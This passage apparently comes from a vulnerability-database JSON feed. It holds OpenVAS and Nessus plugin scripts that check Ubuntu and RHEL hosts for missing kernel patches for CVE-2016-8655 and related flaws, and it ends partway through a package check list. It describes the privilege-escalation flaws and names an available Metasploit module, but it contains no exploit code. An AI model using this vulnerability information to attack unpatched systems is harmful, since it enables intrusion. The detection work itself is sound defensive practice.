"description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842985", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842985", "type": "openvas", "title": "Ubuntu Update for linux USN-3150-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3150-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842985\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:47 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3150-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. 
A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3150-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3150-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-generic\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-generic-pae\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-highbank\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-omap\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-powerpc-smp\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-powerpc64-smp\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-virtual\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-pae\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-highbank\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842988", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842988", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-3150-2", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3150-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842988\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:51 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3150-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the 
af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3150-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3150-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1496-omap4\", ver:\"3.2.0-1496.123\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap4\", ver:\"3.2.0.1496.91\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842979", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842979", "type": "openvas", "title": "Ubuntu Update for linux USN-3152-1", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3152-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842979\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:42 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3152-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in 
the Linux kernel. A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3152-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3152-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-generic\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-generic-lpae\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-lowlatency\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-powerpc-e500mc\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-powerpc-smp\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-powerpc64-emb\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:07:10", "description": "An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. 
(CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nBug Fix(es) :\n\n* Previously, the asynchronous page fault woke code references\nspinlocks, which were actually sleeping locks in the RT kernel.\nBecause of this, when the code was executed from the exception\ncontext, a bug warning appeared on the console. With this update, the\nregular wait queue and spinlock code in this area has been modified to\nuse simple-wait-queue and raw-spinlocks. This code change enables the\nasynchronous page fault code to run in a non-preemptable state without\nbug warnings. 
(BZ#1418035)", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2017:0387)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2017-0387.NASL", "href": "https://www.tenable.com/plugins/nessus/97510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0387. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97510);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0387\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2017:0387)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. 
(CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nBug Fix(es) :\n\n* Previously, the asynchronous page fault woke code references\nspinlocks, which were actually sleeping locks in the RT kernel.\nBecause of this, when the code was executed from the exception\ncontext, a bug warning appeared on the console. With this update, the\nregular wait queue and spinlock code in this area has been modified to\nuse simple-wait-queue and raw-spinlocks. This code change enables the\nasynchronous page fault code to run in a non-preemptable state without\nbug warnings. 
(BZ#1418035)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9084\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2017:0387\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0387\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n 
{\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 